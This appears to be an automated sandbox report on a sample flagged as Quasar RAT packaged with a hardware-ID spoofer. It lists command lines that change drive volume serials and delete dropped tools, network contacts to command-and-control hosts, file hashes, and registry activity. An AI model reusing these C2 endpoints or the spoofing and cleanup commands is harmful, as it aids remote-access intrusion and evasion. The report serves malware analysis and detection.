"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: AO2F-JEN3
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 1T7U-G5OM
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 731N-LSOS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6MK3-J04N
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: UCG5-40TO
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O35N-28F7
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 849M-JU9H
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | gaming7core.info | udp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
Files
memory/1428-0-0x0000000074950000-0x0000000074EFB000-memory.dmp
memory/1428-2-0x00000000020D0000-0x0000000002110000-memory.dmp
memory/1428-1-0x0000000074950000-0x0000000074EFB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | dd3e0eec26c9e936db64082d4d10d630 |
| SHA1 | a8eedd3e25644559db18b701edfb2370cfbaf52c |
| SHA256 | 1b3a1bc69df6d980c9c1e7b76429228dad8055262b35b244fde908a7c40b4127 |
| SHA512 | 1bfc930f23f121dfd555fbbaf82e5f627306be8e97ec728deb4e42842f654d327818e76950b5070029128a6994f29e2d3133e1e4cef814dfdea95bfe4f09445f |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 8197930458a6153c34a1b03e4bcb5375 |
| SHA1 | 59c211de4e3c7bd592acf9223fe2bdd8b5dbee12 |
| SHA256 | 771368641b8fd02433767c4e755f40b48f53fb3c89e4c904d427221b82859d25 |
| SHA512 | 1a25b723cc8edbbb4edddb3b5ff21dfab0d1226f8d225b9417a27d6a67322184092913c9d16a76e91d48fada13e6a345919014d66ca19a745a511f7bca688b3b |
\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | a68e092df53d94b14a2e69e6eb374f76 |
| SHA1 | 199ad2f87b32c28bbf1b2b0cc448e8df7717e38a |
| SHA256 | 7273c865aafc7c2ee2cf55287a4f998da8e754380f57bb585a7d615016c7437c |
| SHA512 | 099eaf461169f56712482d520b6be2b9644fb1e6b5e2866f22af5c3da5771828d30e10bab4cf1a4136e0256640473dbdaf9e19445504f11e7be216446c01863e |
memory/2400-9-0x0000000000FB0000-0x00000000012D4000-memory.dmp
memory/2400-18-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
memory/2740-20-0x000000007EBD0000-0x000000007EFA1000-memory.dmp
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2424-37-0x0000000000BA0000-0x0000000000C8A000-memory.dmp
memory/2728-55-0x00000000028F0000-0x0000000002930000-memory.dmp
memory/2728-57-0x0000000074020000-0x00000000745CB000-memory.dmp
memory/2728-58-0x00000000028F0000-0x0000000002930000-memory.dmp
memory/2424-67-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2728-66-0x00000000028F0000-0x0000000002930000-memory.dmp
memory/2728-68-0x0000000074020000-0x00000000745CB000-memory.dmp
memory/2740-64-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2424-54-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | cafbd27af223f6f85c3b0697e719dacd |
| SHA1 | 95a1e81a2602b422e419577e00b6ad548d1cbfa9 |
| SHA256 | 8711716333b3f16cb0358db530b55b174c8042e1a2dbedf89d7eacb072e242e9 |
| SHA512 | d2dbb9f6f3e9bed249eee6d0d990d71689c525551011f4286a0682d98114571e6b2e495be87589e86ef580f7a4131af8864cfabd3ae28f8715673c2823474304 |
\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | 77d0ad29a3bd8dbf604f101c9cddf8d4 |
| SHA1 | 86583cb1caf29864cff7f115e405c464fe18647f |
| SHA256 | 35c967b02ac8e966a5a6a8b5267be478d53f406a1862ca4dc4c99f4151b596ee |
| SHA512 | e22973df55dccdcd18aba65735a89b8b0fd1f58d78fa30c01b0e547b8af2d00395ab4c56a975da55a0d28e1c6602a06892fcc7ba87569a5a0751e56c9eb19fe1 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | cb63ac7833db68a31f0279f762644488 |
| SHA1 | 182a9ab8fada225c3095556c085e22aa350df98f |
| SHA256 | 06697e8f8792f58c95e6e0a7e90d8f4bebfefe7534128942235008ebca1ac51b |
| SHA512 | 86d5154104c83d9c2339faeee73276d29e2c7ef0f8d939ae812eecd73b8721cb4ca90ab5c5f3f7837f7114a1a0395bf078deeddefe29a87322f616773ee67f39 |
memory/2912-75-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
memory/2912-74-0x0000000000300000-0x0000000000624000-memory.dmp
memory/2424-85-0x0000000000190000-0x000000000019E000-memory.dmp
memory/2424-87-0x00000000773C0000-0x00000000773C1000-memory.dmp
memory/2728-91-0x0000000074020000-0x00000000745CB000-memory.dmp
memory/2424-95-0x00000000003F0000-0x00000000003FE000-memory.dmp
memory/2424-93-0x00000000003E0000-0x00000000003EC000-memory.dmp
memory/2424-99-0x0000000077370000-0x0000000077371000-memory.dmp
memory/2424-100-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2424-98-0x0000000000410000-0x000000000041C000-memory.dmp
memory/2424-101-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2424-96-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
memory/2424-102-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2424-103-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2424-105-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2912-106-0x000000001B1E0000-0x000000001B260000-memory.dmp
memory/2424-107-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2424-108-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2912-104-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
memory/2424-109-0x000000001AE40000-0x000000001AEC0000-memory.dmp
memory/2424-90-0x00000000003D0000-0x00000000003DE000-memory.dmp
memory/2424-88-0x00000000773B0000-0x00000000773B1000-memory.dmp
memory/2424-86-0x00000000773D0000-0x00000000773D1000-memory.dmp
memory/2424-83-0x00000000001B0000-0x00000000001C8000-memory.dmp
memory/1780-140-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/2424-134-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
memory/1780-154-0x0000000002E40000-0x0000000002EC0000-memory.dmp
memory/1780-156-0x0000000002E40000-0x0000000002EC0000-memory.dmp
memory/1844-158-0x0000000002E80000-0x0000000002F00000-memory.dmp
memory/1656-162-0x000007FEEC140000-0x000007FEECADD000-memory.dmp
memory/1656-166-0x0000000002844000-0x0000000002847000-memory.dmp
memory/1844-167-0x000007FEEC140000-0x000007FEECADD000-memory.dmp
memory/1656-165-0x0000000002840000-0x00000000028C0000-memory.dmp
memory/992-164-0x0000000002DFB000-0x0000000002E62000-memory.dmp
memory/1780-163-0x0000000002E44000-0x0000000002E47000-memory.dmp
memory/1656-161-0x000007FEEC140000-0x000007FEECADD000-memory.dmp
memory/1844-160-0x0000000002E80000-0x0000000002F00000-memory.dmp
memory/1844-159-0x0000000002E80000-0x0000000002F00000-memory.dmp
memory/1844-157-0x000007FEEC140000-0x000007FEECADD000-memory.dmp
memory/1780-155-0x000007FEEC140000-0x000007FEECADD000-memory.dmp
memory/1780-153-0x000007FEEC140000-0x000007FEECADD000-memory.dmp
memory/1780-152-0x00000000004B0000-0x00000000004B8000-memory.dmp
memory/2424-81-0x00000000773E0000-0x00000000773E1000-memory.dmp
memory/2424-80-0x0000000000170000-0x000000000018C000-memory.dmp
memory/2424-78-0x0000000000140000-0x000000000014E000-memory.dmp
memory/2912-76-0x000000001B1E0000-0x000000001B260000-memory.dmp
memory/2400-73-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | df27546a0553738685e64842cbe488b3 |
| SHA1 | 2959ef89fdce215a4dc1ab58f636734b72266ebb |
| SHA256 | bc4d1bab345f2fb5f779c6f9ac8e48bbc98453e9256d48bd65ea3b91d2893f61 |
| SHA512 | e10beef1284952b5c3b5c232acc5c0d7ccaf9f011325731f2efad19d210489d00ef959e0e3c401f7701332d9c96d94397593ab88d4719edb73d8aafbff9a5d70 |
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | c4c48a3b867e307f9f5e1d1e329ae885 |
| SHA1 | f77131b77313dfe5e98eda0868fab4149ad02c7b |
| SHA256 | 00a561a5245fe91fd2d51f6304e430165e73bff4590757f54d6e283044f5162f |
| SHA512 | 5a86923bbf017739dddecd8acd5ee3c350dd8a28c66b6cfa8013a97b5942a12eedaa67bc663c8bcedbf7cb3946936c8f9c3ed84a94bff9cfebb0faf99c413f25 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 4b1723d1ea5cbb7ee2e2aecbcaac82d1 |
| SHA1 | a28a3de71a40871bf865219720dbc329ff72a131 |
| SHA256 | 567c26b6ba6410d278b1db4bbbed7e041050c7236b4c58f06a93fcc1354f0a0f |
| SHA512 | 3de1fc799756c8f9d96d2f17073ccda646b213abb48011cff79775d9071b5ebade20a6850ca9a36b1f6311697213f03556027ab94a9ad4929f62c041bdd2301a |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 305412bd89f0ba963d98efc8e066e9ca |
| SHA1 | 12adae50dc2366b8df7706553d86da698702c118 |
| SHA256 | c8c74050d36463a4ca13db903cde8e2405dca6df01e380f26ea08f1643c886a8 |
| SHA512 | acc0881f5e88231317477becbd07b4bd37bfabbc0819e6b2d0afde1a5c0b32348675fc4b89b57fd0b3a41459383dea76e21fc6c99b57e5961e203df29108b303 |
\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 79337964db81ce4114b63d41ffb36aa9 |
| SHA1 | be2adbff05b94d71e77f5afbf9dc88db287d9d02 |
| SHA256 | adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb |
| SHA512 | 13831d3e1bf8d92455cdd2e51d6397dbef1b83b6cb789f2eba7011671287c4449ca4337b6b3ed9576129b90f7c3c670eea7cbf4c4147f1ebe14a6d0f0b33584f |
\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | dd1313842898ffaf72d79df643637ded |
| SHA1 | 93a34cb05fdf76869769af09a22711deea44ed28 |
| SHA256 | 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df |
| SHA512 | db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9 |
memory/2400-21-0x000000001AFA0000-0x000000001B020000-memory.dmp
memory/2740-19-0x0000000000400000-0x0000000001274000-memory.dmp
memory/1428-16-0x0000000074950000-0x0000000074EFB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 41108a3d0f4912dd44a4028e2b1f99cb |
| SHA1 | 663019303ee07b73f8185fe8a9e5fc4d977a0485 |
| SHA256 | 7764f6f5cb802de31b9164cc171fca00bd1f4d0195e1e888b540f0c04285a6c2 |
| SHA512 | 39283ce81991ff932f4262bc8ad99f49242225def31168acd1f88679c8454bea3906d0e68c8a57678ceef40de47c61b485f4d44d3ba7ca490518e2a6a748e95e |
\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 51c7515b35778ed49a89f2a5bdad46e2 |
| SHA1 | 9f11f219eb26375fb2744ef885ddae2a520c9fc5 |
| SHA256 | e8f421e653c120ee10c60b54b9a2e09f9063750b0f388a8ffcbbda245bc6ebab |
| SHA512 | 4e174fb4b8b3560280f6f05229900b46058080820ea15e70e21c478b5341a0086898a5a530a3976faa1d991a0cbbc89fb835628c01fd933a435cb5ca3316fcc5 |
memory/1792-285-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1792-283-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1792-282-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1792-281-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1792-280-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1792-279-0x0000000140000000-0x000000014000E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab9E44.tmp
| MD5 | 84a4974c2d22f28abf6e058f8485b9f9 |
| SHA1 | 397635c06953c1b55290922481c9af07a95a45ab |
| SHA256 | baa03ff90c1c45a132de3de72c8352e1b5eee5bf17bd47f2b42dc460d7225d05 |
| SHA512 | 6545b960ee236c9ff8378052a673b90a38e596eb5a954900022b2b2d6a36593f927b3662135e480069fd5646eab23849bcd035bdd7882ee3e85cacc1be2416df |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-28 18:55
Reported
2023-12-28 18:58
Platform
win10v2004-20231215-en
Max time kernel
46s
Max time network
189s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
Enumerates connected drives
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\wusa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\wusa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\system32\wusa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\system32\wusa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\Volumeid64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\ProgramData\Microsoft\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\System32\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" | C:\Windows\System32\cmd.exe | N/A |
